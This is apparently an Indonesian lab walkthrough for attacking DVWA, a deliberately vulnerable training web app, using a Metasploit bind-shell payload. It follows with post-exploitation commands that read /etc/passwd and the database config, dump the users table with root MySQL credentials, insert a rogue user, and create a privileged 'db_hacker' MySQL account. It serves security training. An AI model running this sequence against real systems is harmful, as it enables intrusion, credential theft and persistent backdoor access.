DVWA: Exploit menggunakan Metasploit
Sumber: https://computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson4/index.html
Persiapan
Masuk ke DVWA, misalnya
http://192.168.0.80/DVWA-1.9
username admin password password
Klik
DVWA Security > Security Level Low > Submit
Gunakan metasploit
Jalankan
msfconsole thankyou
Lakukan
use multi/handler set PAYLOAD linux/x86/shell/bind_tcp show options set RHOST 192.168.0.100 exploit
Cek password
whoami grep apache /etc/passwd grep apache /etc/group
Cek Password melalui konfigurasi Web
ps -eaf | grep http pwd ls -ld /var/www/html ls -ld /var/www/html/DVWA* ls -l /var/www/html/DVWA*
Cari password database
ls -l /var/www/html/dvwa/config cat /var/www/html/dvwa/config/config.inc.php
Explorasi database
echo "show databases;" | mysql -uroot -pdvwaPASSWORD echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
Buat user baru
echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot -pdvwaPASSWORD
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
Lihat informasi tabel MySQL
echo "show databases;" | mysql -uroot -pdvwaPASSWORD echo "use mysql; show tables;" | mysql -uroot -pdvwaPASSWORD
Buat user MySQL yang baru
echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT OPTION;" | mysql -uroot -pdvwaPASSWORD echo "select * from mysql.user;" | mysql -uroot -pdvwaPASSWORD